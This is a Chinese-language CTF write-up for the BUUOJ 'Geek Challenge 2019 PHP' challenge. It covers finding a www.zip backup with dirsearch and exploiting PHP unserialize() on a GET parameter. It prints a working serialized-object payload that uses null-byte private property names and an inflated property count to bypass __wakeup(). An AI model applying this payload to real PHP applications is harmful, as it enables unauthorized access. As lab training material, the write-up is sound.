前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >极客大挑战2019 PHP

极客大挑战2019 PHP

作者头像
Andromeda
发布2022-10-27 14:22:52
1.6K0
发布2022-10-27 14:22:52
举报
文章被收录于专栏:Andromeda的专栏

题目来源:

题目来源

https://buuoj.cn/

敏感备份文件

打开网址,这只小猫真的很好玩,前端大佬,膜!!!

根据他提示的信息,直接上dirsearch扫盘。

这文件可真够多的,不过我只需要备份文件。好!找到你了,www.zip。然后就是把这个文件下载下来了。

分析代码

先看看index.php里面,这里接收了一个GET参数。最重要的是unserialize(@$select),估计又离不开反序列化了。

代码语言:javascript
复制
<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
?>

然后分析class.php里的代码,这里定义了一个类,魔术方法__destruct()在销毁对象时使用,当该对象的username为admin且password为100时能够得到flag。

魔术方法__wakeup()在实例化对象时使用,这里将对象的$username赋值为guest,所以我们需要绕过他。

代码语言:javascript
复制
<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>

代码分析完毕,接下来思路就很清晰了,用GET方式传递一个经过序列化username为admin且password为100的对象实例,然后绕过魔术方法__wakeup(),即可拿下flag

序列化构造payload

跑一下这段脚本,得到我们需要的序列化后的对象。

代码语言:javascript
复制
<?php
    class Name{
        private $username = 'nonono';
        private $password = 'yesyes';
    
        public function __construct($username,$password){
            $this->username = $username;
            this->password = $password;
        }
    }
    $a = new Name('admin', 100);
    var_dump(serialize($a));
?>

运行结果为

代码语言:javascript
复制
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

还没有结束,因为类的两个属性声明为private,所以需要补上00的空字符。

代码语言:javascript
复制
O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

如何绕过__wakeup()呢?

当反序列化中对象属性的个数和真实的个数不等时,__wakeup() 就会被绕过。

所以最后的payload为

代码语言:javascript
复制
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

拿下flag

传参

代码语言:javascript
复制
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

得到flag,收工。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022-09-22,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 敏感备份文件
  • 分析代码
  • 序列化构造payload
  • 拿下flag
相关产品与服务
腾讯云代码分析
腾讯云代码分析(内部代号CodeDog)是集众多代码分析工具的云原生、分布式、高性能的代码综合分析跟踪管理平台,其主要功能是持续跟踪分析代码,观测项目代码质量,支撑团队传承代码文化。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档